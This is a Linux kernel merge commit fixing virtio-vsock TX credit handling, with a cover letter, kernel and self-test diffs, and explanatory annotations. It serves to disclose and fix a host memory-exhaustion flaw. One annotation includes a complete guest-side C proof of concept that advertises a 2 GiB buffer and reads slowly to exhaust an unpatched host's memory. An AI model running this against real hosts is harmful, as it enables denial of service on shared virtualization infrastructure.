
Commit 5778d65

Author/committer: Paolo Abeni <pabeni@redhat.com>
Merge branch 'vsock-virtio-fix-tx-credit-handling'
Stefano Garzarella says:

====================
vsock/virtio: fix TX credit handling

The original series was posted by Melbin K Mathew <mlbnkm1@gmail.com> up to
v4. Since it's a real issue and the original author seems busy, I'm sending
the new version addressing my review comments but keeping the original
authorship (and restoring mine on patch 2, as reported on v4).

v5: https://lore.kernel.org/netdev/20260116201517.273302-1-sgarzare@redhat.com/
v4: https://lore.kernel.org/netdev/20251217181206.3681159-1-mlbnkm1@gmail.com/

From Melbin K Mathew <mlbnkm1@gmail.com>:

This series fixes TX credit handling in virtio-vsock:

Patch 1: Fix potential underflow in get_credit() using s64 arithmetic
Patch 2: Fix vsock_test seqpacket bounds test
Patch 3: Cap TX credit to local buffer size (security hardening)
Patch 4: Add stream TX credit bounds regression test

The core issue is that a malicious guest can advertise a huge buffer size via
SO_VM_SOCKETS_BUFFER_SIZE, causing the host to allocate excessive sk_buff
memory when sending data to that guest.

On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with 32 guest
vsock connections advertising 2 GiB each and reading slowly drove
Slab/SUnreclaim from ~0.5 GiB to ~57 GiB; the system only recovered after
killing the QEMU process.

With this series applied, the same PoC shows only a ~35 MiB increase in
Slab/SUnreclaim, no host OOM, and the guest remains responsive.
====================

Link: https://patch.msgid.link/20260121093628.9941-1-sgarzare@redhat.com
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
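To make the failure mode above concrete, here is a minimal, hypothetical guest-side sketch of what the cover letter describes: the guest raises its advertised receive buffer to 2 GiB via SO_VM_SOCKETS_BUFFER_SIZE and then drains the connection very slowly, so an unpatched host keeps queueing sk_buffs for it. The destination port, the missing setsockopt error checks, and the host-side service that writes the data are assumptions for illustration only; this is not the original PoC.

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>

int main(void)
{
        /* Buffer size options on AF_VSOCK sockets take an unsigned long long. */
        unsigned long long buf_size = 2ULL * 1024 * 1024 * 1024;       /* 2 GiB */
        struct sockaddr_vm addr = {
                .svm_family = AF_VSOCK,
                .svm_cid = VMADDR_CID_HOST,
                .svm_port = 1234,       /* assumed port of a host service */
        };
        int fd = socket(AF_VSOCK, SOCK_STREAM, 0);

        if (fd < 0) {
                perror("socket");
                return 1;
        }

        /* Raise the max first; SO_VM_SOCKETS_BUFFER_SIZE is clamped to it. */
        setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
                   &buf_size, sizeof(buf_size));
        setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
                   &buf_size, sizeof(buf_size));

        if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
                perror("connect");
                return 1;
        }

        /* Read one byte per second so the host's TX queue keeps growing. */
        for (;;) {
                char byte;

                if (read(fd, &byte, 1) <= 0)
                        break;
                sleep(1);
        }

        close(fd);
        return 0;
}

Running several dozen of these in the guest while the host writes to each connection reproduces the memory growth described above; with patch 3 applied, the host caps each connection's TX credit to its own buf_alloc instead of the advertised 2 GiB.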
2 parents ca1bb3f + 2a689f7 commit 5778d65

2 files changed: 133 additions & 9 deletions

net/vmw_vsock/virtio_transport_common.c: 21 additions & 9 deletions
@@ -28,6 +28,7 @@
 
 static void virtio_transport_cancel_close_work(struct vsock_sock *vsk,
                                                bool cancel_timeout);
+static s64 virtio_transport_has_space(struct virtio_vsock_sock *vvs);
 
 static const struct virtio_transport *
 virtio_transport_get_ops(struct vsock_sock *vsk)
@@ -499,9 +500,7 @@ u32 virtio_transport_get_credit(struct virtio_vsock_sock *vvs, u32 credit)
                return 0;
 
        spin_lock_bh(&vvs->tx_lock);
-       ret = vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
-       if (ret > credit)
-               ret = credit;
+       ret = min_t(u32, credit, virtio_transport_has_space(vvs));
        vvs->tx_cnt += ret;
        vvs->bytes_unsent += ret;
        spin_unlock_bh(&vvs->tx_lock);
@@ -822,6 +821,15 @@ virtio_transport_seqpacket_dequeue(struct vsock_sock *vsk,
 }
 EXPORT_SYMBOL_GPL(virtio_transport_seqpacket_dequeue);
 
+static u32 virtio_transport_tx_buf_size(struct virtio_vsock_sock *vvs)
+{
+       /* The peer advertises its receive buffer via peer_buf_alloc, but we
+        * cap it to our local buf_alloc so a remote peer cannot force us to
+        * queue more data than our own buffer configuration allows.
+        */
+       return min(vvs->peer_buf_alloc, vvs->buf_alloc);
+}
+
 int
 virtio_transport_seqpacket_enqueue(struct vsock_sock *vsk,
                                    struct msghdr *msg,
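As a rough illustration of the new cap, here is a self-contained userspace sketch with made-up numbers (the 2 GiB and 256 KiB values are assumptions, not taken from the patch): whatever the peer advertises, the TX path now works with the smaller of peer_buf_alloc and the local buf_alloc.

#include <stdint.h>
#include <stdio.h>

int main(void)
{
        uint32_t peer_buf_alloc = 2U * 1024 * 1024 * 1024;     /* peer advertises 2 GiB */
        uint32_t buf_alloc = 256 * 1024;                       /* local socket buffer, e.g. 256 KiB */

        /* Same effect as min(vvs->peer_buf_alloc, vvs->buf_alloc) above. */
        uint32_t tx_buf = peer_buf_alloc < buf_alloc ? peer_buf_alloc : buf_alloc;

        printf("effective TX buffer: %u bytes\n", tx_buf);     /* prints 262144 */
        return 0;
}

The next hunk applies the same cap to the seqpacket length check, so a message larger than this bound now fails with -EMSGSIZE even if the peer advertises room for it.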
@@ -831,7 +839,7 @@ virtio_transport_seqpacket_enqueue(struct vsock_sock *vsk,
 
        spin_lock_bh(&vvs->tx_lock);
 
-       if (len > vvs->peer_buf_alloc) {
+       if (len > virtio_transport_tx_buf_size(vvs)) {
                spin_unlock_bh(&vvs->tx_lock);
                return -EMSGSIZE;
        }
@@ -877,12 +885,16 @@ u32 virtio_transport_seqpacket_has_data(struct vsock_sock *vsk)
 }
 EXPORT_SYMBOL_GPL(virtio_transport_seqpacket_has_data);
 
-static s64 virtio_transport_has_space(struct vsock_sock *vsk)
+static s64 virtio_transport_has_space(struct virtio_vsock_sock *vvs)
 {
-       struct virtio_vsock_sock *vvs = vsk->trans;
        s64 bytes;
 
-       bytes = (s64)vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt);
+       /* Use s64 arithmetic so if the peer shrinks peer_buf_alloc while
+        * we have bytes in flight (tx_cnt - peer_fwd_cnt), the subtraction
+        * does not underflow.
+        */
+       bytes = (s64)virtio_transport_tx_buf_size(vvs) -
+               (vvs->tx_cnt - vvs->peer_fwd_cnt);
        if (bytes < 0)
                bytes = 0;

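The comment above is easy to verify with a standalone sketch (the numbers are illustrative assumptions): if the peer shrinks peer_buf_alloc below the bytes still in flight, the old u32 expression used in get_credit() wrapped around to an enormous credit, while the new signed computation goes negative and is clamped to zero. The sketch omits the virtio_transport_tx_buf_size() cap to focus on the underflow.

#include <stdint.h>
#include <stdio.h>

int main(void)
{
        uint32_t peer_buf_alloc = 4096;                 /* peer just shrank its buffer */
        uint32_t tx_cnt = 70000, peer_fwd_cnt = 4464;   /* 65536 bytes still in flight */

        /* Old arithmetic: wraps around in u32 and grants ~4 GiB of credit. */
        uint32_t old_credit = peer_buf_alloc - (tx_cnt - peer_fwd_cnt);

        /* New arithmetic: the signed result is negative and gets clamped to 0. */
        int64_t bytes = (int64_t)peer_buf_alloc - (tx_cnt - peer_fwd_cnt);

        if (bytes < 0)
                bytes = 0;

        printf("old credit: %u, new credit: %lld\n", old_credit, (long long)bytes);
        return 0;
}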
@@ -895,7 +907,7 @@ s64 virtio_transport_stream_has_space(struct vsock_sock *vsk)
        s64 bytes;
 
        spin_lock_bh(&vvs->tx_lock);
-       bytes = virtio_transport_has_space(vsk);
+       bytes = virtio_transport_has_space(vvs);
        spin_unlock_bh(&vvs->tx_lock);
 
        return bytes;
@@ -1492,7 +1504,7 @@ static bool virtio_transport_space_update(struct sock *sk,
        spin_lock_bh(&vvs->tx_lock);
        vvs->peer_buf_alloc = le32_to_cpu(hdr->buf_alloc);
        vvs->peer_fwd_cnt = le32_to_cpu(hdr->fwd_cnt);
-       space_available = virtio_transport_has_space(vsk);
+       space_available = virtio_transport_has_space(vvs);
        spin_unlock_bh(&vvs->tx_lock);
        return space_available;
 }

tools/testing/vsock/vsock_test.c: 112 additions & 0 deletions
@@ -347,10 +347,12 @@ static void test_stream_msg_peek_server(const struct test_opts *opts)
 }
 
 #define SOCK_BUF_SIZE (2 * 1024 * 1024)
+#define SOCK_BUF_SIZE_SMALL (64 * 1024)
 #define MAX_MSG_PAGES 4
 
 static void test_seqpacket_msg_bounds_client(const struct test_opts *opts)
 {
+       unsigned long long sock_buf_size;
        unsigned long curr_hash;
        size_t max_msg_size;
        int page_size;
@@ -363,6 +365,16 @@ static void test_seqpacket_msg_bounds_client(const struct test_opts *opts)
                exit(EXIT_FAILURE);
        }
 
+       sock_buf_size = SOCK_BUF_SIZE;
+
+       setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
+                            sock_buf_size,
+                            "setsockopt(SO_VM_SOCKETS_BUFFER_MAX_SIZE)");
+
+       setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
+                            sock_buf_size,
+                            "setsockopt(SO_VM_SOCKETS_BUFFER_SIZE)");
+
        /* Wait, until receiver sets buffer size. */
        control_expectln("SRVREADY");

@@ -2219,6 +2231,101 @@ static void test_stream_accepted_setsockopt_server(const struct test_opts *opts)
        close(fd);
 }
 
+static void test_stream_tx_credit_bounds_client(const struct test_opts *opts)
+{
+       unsigned long long sock_buf_size;
+       size_t total = 0;
+       char buf[4096];
+       int fd;
+
+       memset(buf, 'A', sizeof(buf));
+
+       fd = vsock_stream_connect(opts->peer_cid, opts->peer_port);
+       if (fd < 0) {
+               perror("connect");
+               exit(EXIT_FAILURE);
+       }
+
+       sock_buf_size = SOCK_BUF_SIZE_SMALL;
+
+       setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
+                            sock_buf_size,
+                            "setsockopt(SO_VM_SOCKETS_BUFFER_MAX_SIZE)");
+
+       setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
+                            sock_buf_size,
+                            "setsockopt(SO_VM_SOCKETS_BUFFER_SIZE)");
+
+       if (fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK) < 0) {
+               perror("fcntl(F_SETFL)");
+               exit(EXIT_FAILURE);
+       }
+
+       control_expectln("SRVREADY");
+
+       for (;;) {
+               ssize_t sent = send(fd, buf, sizeof(buf), 0);
+
+               if (sent == 0) {
+                       fprintf(stderr, "unexpected EOF while sending bytes\n");
+                       exit(EXIT_FAILURE);
+               }
+
+               if (sent < 0) {
+                       if (errno == EINTR)
+                               continue;
+
+                       if (errno == EAGAIN || errno == EWOULDBLOCK)
+                               break;
+
+                       perror("send");
+                       exit(EXIT_FAILURE);
+               }
+
+               total += sent;
+       }
+
+       control_writeln("CLIDONE");
+       close(fd);
+
+       /* We should not be able to send more bytes than the value set as
+        * local buffer size.
+        */
+       if (total > sock_buf_size) {
+               fprintf(stderr,
+                       "TX credit too large: queued %zu bytes (expected <= %llu)\n",
+                       total, sock_buf_size);
+               exit(EXIT_FAILURE);
+       }
+}
+
+static void test_stream_tx_credit_bounds_server(const struct test_opts *opts)
+{
+       unsigned long long sock_buf_size;
+       int fd;
+
+       fd = vsock_stream_accept(VMADDR_CID_ANY, opts->peer_port, NULL);
+       if (fd < 0) {
+               perror("accept");
+               exit(EXIT_FAILURE);
+       }
+
+       sock_buf_size = SOCK_BUF_SIZE;
+
+       setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
+                            sock_buf_size,
+                            "setsockopt(SO_VM_SOCKETS_BUFFER_MAX_SIZE)");
+
+       setsockopt_ull_check(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
+                            sock_buf_size,
+                            "setsockopt(SO_VM_SOCKETS_BUFFER_SIZE)");
+
+       control_writeln("SRVREADY");
+       control_expectln("CLIDONE");
+
+       close(fd);
+}
+
 static struct test_case test_cases[] = {
        {
                .name = "SOCK_STREAM connection reset",
@@ -2408,6 +2515,11 @@ static struct test_case test_cases[] = {
                .run_client = test_stream_msgzcopy_mangle_client,
                .run_server = test_stream_msgzcopy_mangle_server,
        },
+       {
+               .name = "SOCK_STREAM TX credit bounds",
+               .run_client = test_stream_tx_credit_bounds_client,
+               .run_server = test_stream_tx_credit_bounds_server,
+       },
        {},
 };

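For reference, the new "SOCK_STREAM TX credit bounds" case runs as part of the usual vsock_test host/guest pair. The invocation below follows the flags commonly documented in tools/testing/vsock/README and may differ per tree; the control port, guest IP and guest CID are placeholders:

  guest$ ./vsock_test --mode=server --control-port=1234 --peer-cid=2
  host$  ./vsock_test --mode=client --control-host=<guest IP> --control-port=1234 --peer-cid=<guest CID>

The client side configures a 64 KiB local buffer (SOCK_BUF_SIZE_SMALL), queues 4 KiB non-blocking writes until it hits EAGAIN, and then fails if it managed to queue more than that local buffer size, regardless of the 2 MiB buffer the server advertises.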